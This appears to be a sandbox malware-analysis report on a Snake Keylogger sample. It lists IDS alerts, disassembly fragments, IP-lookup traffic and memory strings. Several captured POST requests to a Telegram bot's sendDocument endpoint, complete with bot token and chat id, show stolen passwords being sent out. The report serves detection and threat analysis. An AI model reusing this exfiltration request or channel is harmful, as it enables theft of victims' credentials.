            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_069633B8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]13_2_069633A8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06966E79h13_2_06966BD0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 069665C9h13_2_06966320
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06966A21h13_2_06966778
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06960741h13_2_06960498
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06967751h13_2_069674A8
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06960B99h13_2_069608F0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 069672FAh13_2_06967050
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 069602E9h13_2_06960040
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06965441h13_2_06965198
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06968459h13_2_069681B0
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06967BA9h13_2_06967900
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06968001h13_2_06967D58
            Source: C:\Users\user\AppData\Roaming\tjvxuavKFXO.exeCode function: 4x nop then jmp 06960FF1h13_2_06960D48

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:62946 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:62955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:62955 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.4:62946 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficTCP traffic: 192.168.2.4:62944 -> 1.1.1.1:53
            Source: global trafficTCP traffic: 192.168.2.4:59873 -> 1.1.1.1:53
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939220311&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50e17492f410Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939220311&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5109f061e5eeHost: api.telegram.orgContent-Length: 556Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49736 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49752 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49754 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49739 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49758 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49750 -> 104.21.16.1:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49737 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49747 version: TLS 1.0
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
            Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
            Source: global trafficDNS traffic detected: DNS query: api.telegram.org
            Source: unknownHTTP traffic detected: POST /bot7347885220:AAFmOXgoc0UBDpYJA8OUR6HtUv-Uevo_Ttc/sendDocument?chat_id=6939220311&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50e17492f410Host: api.telegram.orgContent-Length: 569Connection: Keep-Alive
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002CA6000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002C9A000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002CE9000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E46000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D75000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D69000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
            Source: customer request.exe, 00000000.00000002.1722509797.0000000004D1D000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4133954704.000000000041B000.00000040.00000400.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004B99000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1763910283.0000000004C7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
            Source: customer request.exe, tjvxuavKFXO.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: customer request.exe, tjvxuavKFXO.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: customer request.exe, tjvxuavKFXO.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002CBE000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D47000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D54000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D8E000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D62000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D39000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002D9E000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E2A000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E0F000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E67000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002E1C000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
            Source: customer request.exe, 00000000.00000002.1721290300.000000000328A000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000008.00000002.4137608364.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000A.00000002.1760824338.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmp, customer request.exe, 00000000.00000002.1724779227.00000000058FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: customer request.exe, 00000000.00000002.1725057082.0000000007242000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: customer request.exe, 00000008.00000002.4137608364.0000000002E72000.00000004.00000800.00020000.00000000.sdmp, tjvxuavKFXO.exe, 0000000D.00000002.4137995845.0000000002F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
